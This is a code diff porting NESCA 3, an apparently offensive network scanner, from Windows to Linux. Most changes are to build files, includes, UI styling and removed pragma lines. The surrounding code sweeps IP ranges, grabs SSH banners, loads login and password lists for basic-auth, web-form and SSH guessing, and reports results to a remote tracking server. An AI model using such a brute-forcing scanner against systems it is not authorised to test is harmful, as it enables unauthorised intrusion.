+ continue;
+ }
+ cont = false;
+ }
+ else
+ {
+ cout << "Recv: not an echo reply" << endl;
+ continue;
+ }
+
+ gettimeofday(&end, NULL);
+ end_t = 1000000*(end.tv_sec - start.tv_sec) + (end.tv_usec - start.tv_usec);
+
+ if(end_t < 1)
+ end_t = 1;
+
+ cout << "Elapsed time = " << end_t << " usec" << endl;
+ return end_t;
+ }
+ else
+ {
+ cout << "No data within one seconds.\n";
+ return 0;
+ }
+ }
+ return 0;
+}
+
+uint16_t in_cksum(uint16_t *addr, unsigned len)
+{
+ uint16_t answer = 0;
+ /*
+ * Our algorithm is simple, using a 32 bit accumulator (sum), we add
+ * sequential 16 bit words to it, and at the end, fold back all the
+ * carry bits from the top 16 bits into the lower 16 bits.
+ */
+ uint32_t sum = 0;
+ while (len > 1) {
+ sum += *addr++;
+ len -= 2;
+ }
+
+ // mop up an odd byte, if necessary
+ if (len == 1) {
+ *(unsigned char *)&answer = *(unsigned char *)addr ;
+ sum += answer;
+ }
+
+ // add back carry outs from top 16 bits to low 16 bits
+ sum = (sum >> 16) + (sum & 0xffff); // add high 16 to low 16
+ sum += (sum >> 16); // add carry
+ answer = ~sum; // truncate to 16 bits
+ return answer;
+}
+#endif
+QString strIP;
+QString strPort;
+const char *buff1 = "GET / HTTP/1.1\r\nHost: ";
+const char *buff2 = "\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: us-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nConnection: close\r\n\r\n";
+int Connector::_SSHLobby(char *ip, int port, conSTR *CSTR)
+{
+ char banner[256] = {0};
+ strncpy(banner, _get_ssh_banner(ip, port), 256);
+ if(strlen(banner) > 0)
+ {
+ return _EstablishSSHConnection(ip, port, CSTR, banner);
+ };
+};
+int Connector::_ConnectToPort(char *ip, const char *portC, char *hl)
+{
+ if(gPingNScan)
+ {
+ if(_pingMyTarget(ip) == 0)
+ {
+ return -2;
+ };
+ };
+
+ char mes[512] = {0};
+ conSTR CSTR;
+ CSTR.lowerBuff = NULL;
+ CSTR.size = 0;
+
+ int strFlag = 0;
+ strcpy(mes, buff1);
+ strcat(mes, ip);
+ int port = atoi(portC);
+ if(port != 80){
+ strcat(mes, ":");
+ strcat(mes, portC);
+ };
+ strcat(mes, buff2);
+ int cRes;
+
+ if(port == 443) cRes = _EstablishSSLConnection(ip, port, mes, &CSTR);
+ else if(port == 22) cRes = _SSHLobby(ip, port, &CSTR);
+ else cRes = _EstablishConnection(ip, port, mes, &CSTR);
+ int size = CSTR.size;
+
+ if(cRes == -2) return -2;
+
+ if(size > 0 && cRes != -1)
+ {
+ ++Alive;
+ ++found;
+ stt->doEmitionChangeParsed(QString::number(saved) + "/" + QString::number(found));
+
+ Lexems lx;
+ lx._filler(port, CSTR.lowerBuff, ip, size, &lx, hl);
+ delete []CSTR.lowerBuff;
+ CSTR.lowerBuff = NULL;
+ };
+
+ if(CSTR.lowerBuff != NULL)
+ {
+ delete []CSTR.lowerBuff;
+ CSTR.lowerBuff = NULL;
+ };
+ strFlag = 1;
+};
diff --git a/externData.h b/externData.h
index 0dd92da..dc01889 100644
--- a/externData.h
+++ b/externData.h
@@ -1,6 +1,5 @@
#define RECV_MAX_SIZE 350000
#define REQUEST_MAX_SIZE 4096
-#define SD_BOTH 2
#define PORTSET "80,81,88,8080,8081,60001,60002,8008,8888,554,9000,441,4111,6667,3536,22,21"
#define IRC_CHAN "iskopasi_lab03"
#define CSSOCKET(Socket) shutdown(Socket, SD_BOTH); closesocket(Socket); Socket = -1;
diff --git a/externFunctions.h b/externFunctions.h
index 67b5f3d..7bb5d18 100644
--- a/externFunctions.h
+++ b/externFunctions.h
@@ -9,7 +9,7 @@ extern void BConInc();
extern void BConDec();
extern QString GetNSErrorDefinition(char *str, char *defin);
extern void _SaveBackupToFile();
-extern char* __cdecl strstri(char *_Str, const char *_SubStr);
+extern char* strstri(char *_Str, const char *_SubStr);
extern char* _getAttribute(char *str, char *attrib);
extern char *_findFirst(char *str, char *delim);
extern void nCleanup();
diff --git a/main.cpp b/main.cpp
index 64303be..7fd5c26 100644
--- a/main.cpp
+++ b/main.cpp
@@ -1,8 +1,8 @@
#include "nesca_3.h"
#include
+#include
#if defined(Q_OS_WIN32)
#include
-#include
#endif
//--Fixing _ITERATOR_DEBUG_LEVEL 0!=2
@@ -44,4 +44,4 @@ nesca_3 *gui = new nesca_3();
gui->showNormal();
return a.exec();
}
-
\ No newline at end of file
+
diff --git a/mainResources.h b/mainResources.h
index b764316..f418e59 100644
--- a/mainResources.h
+++ b/mainResources.h
@@ -1,17 +1,15 @@
#pragma once
#include "base64.h"
-#include
-#if defined(Q_OS_WIN32)
+#include
+#include
+#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
#pragma once
#include "iostream"
#include
#include
#include
-#include
-#endif
-#if defined(Q_OS_LINUX)
-#pragma once
+#else
#include
#include
#include
@@ -36,16 +34,20 @@
#define WSAGetLastError() errno
#define closesocket(sock) ::close((sock))
+typedef unsigned int DWORD;
+typedef void* LPVOID;
+typedef void* HANDLE;
typedef unsigned int UINT;
typedef const char * LPCSTR;
typedef int SOCKET;
typedef hostent HOSTENT;
typedef struct linger LINGER;
typedef int BOOL;
+
#define INVALID_SOCKET (SOCKET)(~0)
-#define SOCKET_ERROR (-1)
+#define SOCKET_ERROR (-1)
#define SD_BOTH 0x02
-#define FAR far
+#define FAR far
#endif
#define MAX_ADDR_LEN 128
diff --git a/nesca.pro b/nesca.pro
index 59b12cd..9edf02e 100644
--- a/nesca.pro
+++ b/nesca.pro
@@ -8,13 +8,65 @@ QT += core gui
greaterThan(QT_MAJOR_VERSION, 4): QT += widgets
+PKGCONFIG += openssl
+CONFIG += c++11
+
TARGET = nesca
TEMPLATE = app
+LIBS += -lssh
+INCLUDEPATH += /opt/Qt5.3.2/5.3/gcc_64/include/QtWidgets/
+SOURCES +=\
+ main.cpp \
+ ActivityDrawerTh_HorNet.cpp \
+ base64.cpp \
+ CheckKey_Th.cpp \
+ CheckProxy_Th.cpp \
+ connector.cpp \
+ DrawerTh_GridQoSScanner.cpp \
+ DrawerTh_HorNet.cpp \
+ DrawerTh_ME2Scanner.cpp \
+ DrawerTh_QoSScanner.cpp \
+ DrawerTh_VoiceScanner.cpp \
+ irc_nmblinker.cpp \
+ IRCPinger_Th.cpp \
+ msgcheckerthread.cpp \
+ nesca_3.cpp \
+ nesca_startModule.cpp \
+ oIRC_Th.cpp \
+ piestat.cpp \
+ progressbardrawer.cpp \
+ STh.cpp \
+ vercheckerthread.cpp
-SOURCES += main.cpp\
- mainwindow.cpp
+HEADERS += ActivityDrawerTh_HorNet.h \
+ base64.h \
+ CheckKey_Th.h \
+ CheckProxy_Th.h \
+ DrawerTh_GridQoSScanner.h \
+ DrawerTh_HorNet.h \
+ DrawerTh_ME2Scanner.h \
+ DrawerTh_QoSScanner.h \
+ DrawerTh_VoiceScanner.h \
+ externData.h \
+ externFunctions.h \
+ irc_nmblinker.h \
+ IRCPinger_Th.h \
+ mainResources.h \
+ msgcheckerthread.h \
+ nesca_3.h \
+ oIRC_Th.h \
+ piestat.h \
+ progressbardrawer.h \
+ resource.h \
+ STh.h \
+ vercheckerthread.h
-HEADERS += mainwindow.h
+FORMS += nesca_3.ui
+
+RESOURCES += \
+ nesca_3.qrc
+
+OTHER_FILES += \
+ nesca_3.rc
-FORMS += mainwindow.ui
diff --git a/nesca_3.cpp b/nesca_3.cpp
index 236a3eb..0fcade7 100644
--- a/nesca_3.cpp
+++ b/nesca_3.cpp
@@ -170,7 +170,7 @@ bool ME2ScanFlag = true, QoSScanFlag = false, VoiceScanFlag = false, PieStatFlag
Ui::nesca_3Class *ui = new Ui::nesca_3Class;
-#pragma endregion
+
void setSceneArea()
{
delete ui->graphicsVoice;
@@ -1426,16 +1426,16 @@ void nesca_3::ConnectToIRCServer()
}
else
{
-#pragma region QTGUI_Area
+
ui->ircText->append("No IRC port specified!");
-#pragma endregion
+
};
}
else
{
-#pragma region QTGUI_Area
+
ui->ircText->append("No IRC server specified!");
-#pragma endregion
+
};
};
void nesca_3::ChangeIRCRawLog()
@@ -2514,7 +2514,7 @@ void nesca_3::smReaction()
};
};
-#pragma endregion
+
void nesca_3::IPScanSeq()
{
if(ui->ipLine->text() != "")
@@ -2919,7 +2919,7 @@ void nesca_3::ConnectEvrthng()
connect ( psTh, SIGNAL(sUpdatePie()), this, SLOT(slotUpdatePie()) );
connect ( irc_nmb, SIGNAL(sBlinkMessage()), this, SLOT(slotBlinkMessage()) );
};
-#pragma endregion
+
void RestoreSession()
{
@@ -2929,9 +2929,9 @@ void RestoreSession()
if(resFile != NULL)
{
-#pragma region QTGUI_Area
+
stt->doEmitionYellowFoundData("Previous session file found! Restoring...");
-#pragma endregion
+
while(fgets(resStr, 128, resFile) != NULL)
{
if(strstr(resStr, "[SESSION]:") != NULL)
@@ -3198,9 +3198,9 @@ void RestoreSession()
};
fclose(resFile);
-#pragma region QTGUI_Area
+
stt->doEmitionGreenFoundData("Previous session restored.");
-#pragma endregion
+
};
}
void CreateVerFile()
@@ -3338,10 +3338,10 @@ void _startMsgCheck()
WSADATA wsda;
if (WSAStartup(0x0101, &wsda))
{
- #pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("WSAStartup failed.");
stt->doEmitionKillSttThread();
- #pragma endregion
+
};
#endif
@@ -3829,7 +3829,7 @@ void nesca_3::appendDefaultIRCText(bool pm, bool hlflag, int cCode, QString str,
pos += colr.matchedLength();
thisIsUrl = true;
};
-#pragma endregion
+
#pragma region Bold-handler
int posBold = 0;
@@ -3844,7 +3844,7 @@ void nesca_3::appendDefaultIRCText(bool pm, bool hlflag, int cCode, QString str,
posBold += boldr.matchedLength();
thisIsUrl = true;
};
-#pragma endregion
+
#pragma region underline-handler
int posUnder = 0;
@@ -3859,7 +3859,7 @@ void nesca_3::appendDefaultIRCText(bool pm, bool hlflag, int cCode, QString str,
posUnder += under.matchedLength();
thisIsUrl = true;
};
-#pragma endregion
+
#pragma region link-handler
r.indexIn(str);
@@ -3871,7 +3871,7 @@ void nesca_3::appendDefaultIRCText(bool pm, bool hlflag, int cCode, QString str,
str.replace(r, "" + link.trimmed() + " ");
thisIsUrl = true;
};
-#pragma endregion
+
str.replace("", "");
str.replace("", "");
diff --git a/nesca_3.h b/nesca_3.h
index 5c39a60..585757c 100644
--- a/nesca_3.h
+++ b/nesca_3.h
@@ -9,8 +9,8 @@
#include
#include
#include "ui_nesca_3.h"
-#include
-#include
+#include
+#include
#include
#include
#include
@@ -18,7 +18,8 @@
#include
#include
#include
-#include
+#include
+#include
extern Ui::nesca_3Class *ui;
extern bool widgetIsHidden, IRCLogToggled, BALogSwitched, blinkFlag, disableBlink, debugFileOK, QOSWait,
@@ -192,7 +193,7 @@ protected:
move(x()+delta.x(), y()+delta.y());
oldPos = evt->globalPos();
}
- void mouseReleaseEvent(QMouseEvent *evt)
+ void mouseReleaseEvent()
{
if(switchWindows)
{
diff --git a/nesca_3.ui b/nesca_3.ui
index 1a30e30..bb2476c 100644
--- a/nesca_3.ui
+++ b/nesca_3.ui
@@ -32,7 +32,7 @@
NESCA 3
-
+
:/nesca_3/Z:/nesca.ico:/nesca_3/Z:/nesca.ico
@@ -1677,7 +1677,7 @@ border-radius: 3px;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html><head><meta name="qrichtext" content="1" /><style type="text/css">
p, li { white-space: pre-wrap; }
-</style></head><body style=" font-family:'Consolas'; font-size:8.25pt; font-weight:400; font-style:normal;">
+</style></head><body style=" font-family:'Consolas'; font-size:11pt; font-weight:400; font-style:normal;">
<p style="-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:'MS Shell Dlg 2'; font-size:8pt;"><br /></p></body></html>
@@ -2179,7 +2179,7 @@ p, li { white-space: pre-wrap; }
-
+
:/nesca_3/Z:/nesca.ico:/nesca_3/Z:/nesca.ico
@@ -2432,7 +2432,7 @@ p, li { white-space: pre-wrap; }
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html><head><meta name="qrichtext" content="1" /><style type="text/css">
p, li { white-space: pre-wrap; }
-</style></head><body style=" font-family:'Eurostile'; font-size:8.25pt; font-weight:400; font-style:normal;">
+</style></head><body style=" font-family:'Eurostile'; font-size:11pt; font-weight:400; font-style:normal;">
<p style="-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:8pt;"><br /></p></body></html>
@@ -3043,62 +3043,188 @@ background-color: #000000;
+
+
+
+
+
+ 16
+ 16
+ 16
+
+
+
+
+ 0
+ 0
+ 0
+
+
+
+
+
-
-
- 49
- 49
- 49
-
+
+
+
+
+ 16
+ 16
+ 16
+
+
+
+
+ 0
+ 0
+ 0
+
+
+
-
-
- 0
- 0
- 0
-
+
+
+
+
+ 16
+ 16
+ 16
+
+
+
+
+ 0
+ 0
+ 0
+
+
+
+
+
+
+
+
+ 16
+ 16
+ 16
+
+
+
+
+ 0
+ 0
+ 0
+
+
+
+
+
-
-
- 49
- 49
- 49
-
+
+
+
+
+ 16
+ 16
+ 16
+
+
+
+
+ 0
+ 0
+ 0
+
+
+
-
-
- 0
- 0
- 0
-
+
+
+
+
+ 16
+ 16
+ 16
+
+
+
+
+ 0
+ 0
+ 0
+
+
+
+
+
+
+
+
+ 16
+ 16
+ 16
+
+
+
+
+ 0
+ 0
+ 0
+
+
+
+
+
-
-
- 0
- 0
- 0
-
+
+
+
+
+ 16
+ 16
+ 16
+
+
+
+
+ 0
+ 0
+ 0
+
+
+
-
-
- 0
- 0
- 0
-
+
+
+
+
+ 16
+ 16
+ 16
+
+
+
+
+ 0
+ 0
+ 0
+
+
+
@@ -3287,7 +3413,7 @@ background-color: #000000;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html><head><meta name="qrichtext" content="1" /><style type="text/css">
p, li { white-space: pre-wrap; }
-</style></head><body style=" font-family:'Eurostile'; font-size:8.25pt; font-weight:400; font-style:normal;">
+</style></head><body style=" font-family:'Eurostile'; font-size:11pt; font-weight:400; font-style:normal;">
<p style="-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:8pt;"><br /></p></body></html>
@@ -3423,7 +3549,7 @@ p, li { white-space: pre-wrap; }
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html><head><meta name="qrichtext" content="1" /><style type="text/css">
p, li { white-space: pre-wrap; }
-</style></head><body style=" font-family:'Eurostile'; font-size:8.25pt; font-weight:400; font-style:normal;">
+</style></head><body style=" font-family:'Eurostile'; font-size:11pt; font-weight:400; font-style:normal;">
<p style="-qt-paragraph-type:empty; margin-top:2px; margin-bottom:2px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:8pt;"><br /></p></body></html>
@@ -3884,8 +4010,6 @@ color: rgb(71, 71, 71);
exitButton
dataText
-
-
-
+
diff --git a/nesca_startModule.cpp b/nesca_startModule.cpp
index cbd4f17..5aafbae 100644
--- a/nesca_startModule.cpp
+++ b/nesca_startModule.cpp
@@ -141,9 +141,9 @@ void ConInc()
{
lock inc cons;
};
- #pragma region QTGUI_Area
+
stt->doEmitionThreads(QString::number(cons) + "/" + QString::number(gThreads));
- #pragma endregion
+
};
void ConDec()
{
@@ -154,9 +154,9 @@ void ConDec()
lock dec cons;
};
};
- #pragma region QTGUI_Area
+
stt->doEmitionThreads(QString::number(cons) + "/" + QString::number(gThreads));
- #pragma endregion
+
};
void _SaveBackupToFile()
{
@@ -411,10 +411,10 @@ void *_timer()
strcat(dbuffer, "d)");
strcat(timeLeft, (strcmp(dbuffer, "1.$d)") == 0 ? "INF)" : dbuffer));
-#pragma region QTGUI_Area
+
stt->doEmitionIPS(QString(timeLeft));
stt->doEmitionOffline(QString::number(offlines));
-#pragma endregion
+
ZeroMemory(timeLeft, sizeof(timeLeft));
ZeroMemory(dbuffer, sizeof(dbuffer));
Sleep(1000);
@@ -463,18 +463,18 @@ void *_tracker()
if(connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr)) == -1)
{
CSSOCKET(sock);
-#pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("[NS-Track] -Cannot connect to balancer! " + QString::number(WSAGetLastError()) + ".");
-#pragma endregion
+
continue;
};
if(send(sock, msg, strlen(msg), 0) == -1)
{
CSSOCKET(sock);
-#pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("[NS-Track] -Cannot send to balancer! " + QString::number(WSAGetLastError()) + ".");
-#pragma endregion
+
continue;
};
@@ -497,9 +497,9 @@ void *_tracker()
if(test == -1)
{
CSSOCKET(sock);
-#pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("[NS-Track] -Cannot recv from balancer! " + QString::number(WSAGetLastError()) + ".");
-#pragma endregion
+
continue;
};
@@ -515,19 +515,19 @@ void *_tracker()
if(ln > 64)
{
CSSOCKET(sock);
-#pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("[NS-Track] -Received server string is not valid!");
SaveErrorLog("NS-Track", msg, rBuffT);
-#pragma endregion
+
continue;
}
else strncpy(ndbServer, (char*)(t1 + strlen("http://")), ln);
if(strlen(t2) > 64)
{
-#pragma region QTGUI_Area
+
stt->doEmitionYellowFoundData("[NS-Track] -Fragmentation detected!");
-#pragma endregion
+
if(strstr(t2, "\r\n") != NULL)
{
char *t3 = strstr(t2, "\r\n");
@@ -536,9 +536,9 @@ void *_tracker()
if(y > 64)
{
CSSOCKET(sock);
-#pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("[NS-Track] -Received server string is not valid!");
-#pragma endregion
+
SaveErrorLog("NS-Track", msg, rBuffT);
continue;
}
@@ -546,18 +546,18 @@ void *_tracker()
{
strncpy(ndbScriptT, t2, y);
CSSOCKET(sock);
-#pragma region QTGUI_Area
+
stt->doEmitionGreenFoundData("[NS-Track] -OK! -Fragmented server string aquired! Starting NS-Track loop...");
-#pragma endregion
+
strncpy(ndbScript, ndbScriptT, strlen(ndbScriptT) );
};
}
else
{
CSSOCKET(sock);
-#pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("[NS-Track] -Received server string is not valid!");
-#pragma endregion
+
SaveErrorLog("NS-Track", msg, rBuffT);
continue;
};
@@ -565,9 +565,9 @@ void *_tracker()
else
{
strcpy(ndbScriptT, t2);
-#pragma region QTGUI_Area
+
stt->doEmitionGreenFoundData("[NS-Track] -OK! -Server string aquired! Starting NS-Track loop...");
-#pragma endregion
+
CSSOCKET(sock);
strncpy(ndbScript, ndbScriptT, strlen(ndbScriptT) - 2 );
};
@@ -575,9 +575,9 @@ void *_tracker()
else
{
CSSOCKET(sock);
-#pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("[NS-Track] -Cannot receive script value!");
-#pragma endregion
+
continue;
};
@@ -668,9 +668,9 @@ void *_tracker()
{
CSSOCKET(sock);
-#pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("[NS-Track] -connect() returned " + QString::number(WSAGetLastError()) + ".");
-#pragma endregion
+
continue;
};
@@ -684,9 +684,9 @@ void *_tracker()
if(send(sock, msg, strlen(msg), 0) == -1)
{
CSSOCKET(sock);
-#pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("[NS-Track] -send() returned " + QString::number(WSAGetLastError()) + ".");
-#pragma endregion
+
SaveErrorLog("NS-Track", msg, "");
continue;
};
@@ -729,29 +729,29 @@ void *_tracker()
if(test == -1)
{
CSSOCKET(sock);
-#pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("[NS-Track] -recv() returned " + QString::number(WSAGetLastError()) + ".");
-#pragma endregion
+
SaveErrorLog("NS-Track", msg, "");
continue;
};
if(strstr(rBuffT, "201 Created") != NULL)
{
-#pragma region QTGUI_Area
+
if(gDebugMode) stt->doEmitionYellowFoundData("[NS-Track] -OK. Data saved!");
stt->doEmitionDataSaved(true);
Sleep(1000);
stt->doEmitionDataSaved(false);
-#pragma endregion
+
}
else if(strstr(rBuffT, "400 Bad Request") != NULL)
{
-#pragma region QTGUI_Area
+
QString errorDef = GetNSErrorDefinition(rBuffT, "notify");
if(errorDef == "Invalid access key") stt->doEmitionYellowFoundData("[NS-Track] [Key is unauthorized] A valid key is required.");
else stt->doEmitionYellowFoundData("[NS-Track] -FAIL! [400 Bad Request : " + errorDef + "]");
-#pragma endregion
+
SaveErrorLog("NS-Track", msg, rBuffT);
}
else
@@ -868,7 +868,7 @@ unsigned long int numOfIps(int ipsstart[], int ipsend[])
// // };
// // };
// //};
-//#pragma endregion
+//
//
// return res;
//};
@@ -913,10 +913,10 @@ void targetAndIPWriter(unsigned long int target, char *buff)
strcpy(curIPBuff, "--->");
strcat(curIPBuff, buff);
- #pragma region QTGUI_Area
+
stt->doEmitionIPRANGE(QString(curIPBuff));
stt->doEmitionTargetsLeft(QString(targetNPers));
- #pragma endregion
+
};
void _passLoginFapper()
{
@@ -971,9 +971,9 @@ void _passLoginFapper()
ZeroMemory(buffFG, sizeof(buffFG));
};
- #pragma region QTGUI_Area
+
stt->doEmitionGreenFoundData("Password list loaded (" + QString(std::to_string(MaxPass).c_str()) + " entries)");
- #pragma endregion
+
i = 0;
@@ -986,19 +986,19 @@ void _passLoginFapper()
ZeroMemory(buffFG, sizeof(buffFG));
};
- #pragma region QTGUI_Area
+
stt->doEmitionGreenFoundData("Login list loaded (" + QString(std::to_string(MaxLogin).c_str()) + " entries)");
- #pragma endregion
+
fclose(loginList);
fclose(passList);
}
else
{
- #pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("No password/login list found");
stt->doEmitionKillSttThread();
- #pragma endregion
+
};
MaxWFLogin = 0;
@@ -1052,9 +1052,9 @@ void _passLoginFapper()
ZeroMemory(buffFG, sizeof(buffFG));
};
- #pragma region QTGUI_Area
+
stt->doEmitionGreenFoundData("WFPassword list loaded (" + QString(std::to_string(MaxWFPass).c_str()) + " entries)");
- #pragma endregion
+
i = 0;
@@ -1067,19 +1067,19 @@ void _passLoginFapper()
ZeroMemory(buffFG, sizeof(buffFG));
};
- #pragma region QTGUI_Area
+
stt->doEmitionGreenFoundData("WFLogin list loaded (" + QString(std::to_string(MaxWFLogin).c_str()) + " entries)");
- #pragma endregion
+
fclose(wfLoginList);
fclose(wfLoginList);
}
else
{
- #pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("No password/login list found");
stt->doEmitionKillSttThread();
- #pragma endregion
+
};
#pragma region SSHPASS
@@ -1118,24 +1118,24 @@ void _passLoginFapper()
ZeroMemory(buffFG, sizeof(buffFG));
};
- #pragma region QTGUI_Area
+
stt->doEmitionGreenFoundData("SSH Password list loaded (" + QString(std::to_string(MaxSSHPass).c_str()) + " entries)");
- #pragma endregion
+
fclose(sshlpList);
}
else
{
- #pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("No password/login list found");
stt->doEmitionKillSttThread();
- #pragma endregion
+
};
-#pragma endregion
- #pragma region QTGUI_Area
+
+
stt->doEmitionYellowFoundData("BA: ~" + QString(std::to_string(MaxLogin * MaxPass/gTimeOut/60).c_str()) + "; WF: ~" + QString(std::to_string(MaxWFLogin * MaxWFPass/gTimeOut/60).c_str()) + "; SSH: ~" + QString(std::to_string(MaxSSHPass/gTimeOut/60).c_str()));
- #pragma endregion
+
};
void ReadUTF8(FILE* nFile, char *cp)
{
@@ -1231,19 +1231,19 @@ void ReadUTF8(FILE* nFile, char *cp)
ZeroMemory(buffFG, sizeof(buffFG));
};
- #pragma region QTGUI_Area
+
stt->doEmitionGreenFoundData("Negative list loaded (" + QString::number(GlobalNegativeSize) + " entries)");
- #pragma endregion
+
ZeroMemory(buffFG, sizeof(buffFG));
fclose(nFile);
}
else
{
- #pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("No negative list found");
stt->doEmitionKillSttThread();
- #pragma endregion
+
};
}
#ifdef WIN32
@@ -1341,10 +1341,10 @@ void CheckMaskBits(char *res, int index)
}
else
{
-#pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("[CheckMaskBits] Cannot parse IP list");
stt->doEmitionKillSttThread();
-#pragma endregion
+
};
};
void GetOctets(char *curIP)
@@ -2225,7 +2225,7 @@ int _GetDNSFromMask(char *mask, char *saveMask, char *saveMaskEnder)
};
#endif
Sleep(gThreadDelay);
-#pragma endregion
+
};
};
@@ -2275,10 +2275,10 @@ int startScan(char* args)
int resInit = fInit(gMode, gRange);
if(resInit == -1 )
{
- #pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("[Error] fInit failure");
stt->doEmitionKillSttThread();
- #pragma endregion
+
return -1;
};
@@ -2797,26 +2797,26 @@ stt->doEmitionThreads(QString::number(0) + "/" + QString::number(gThreads));
}
else
{
-#pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("Wrong parameters.");
-#pragma endregion
+
};
Sleep(gTimeOut + 1);
- #pragma region QTGUI_Area
+
stt->doEmitionYellowFoundData("Stopping threads...");
stt->doEmitionChangeStatus("Stopping...");
- #pragma endregion
+
while(cons > 0 || isActive == 1 || jsonArr->size() > 0) Sleep(2000);
nCleanup();
- #pragma region QTGUI_Area
+
stt->doEmitionGreenFoundData("Done. Saved: " + QString::number(saved) + "; Alive: " + QString::number(found) + ".");
stt->doEmitionChangeParsed(QString::number(saved) + "/" + QString::number(found));
stt->doEmitionChangeStatus("Idle");
stt->doEmitionKillSttThread();
- #pragma endregion
+
};
void nCleanup(){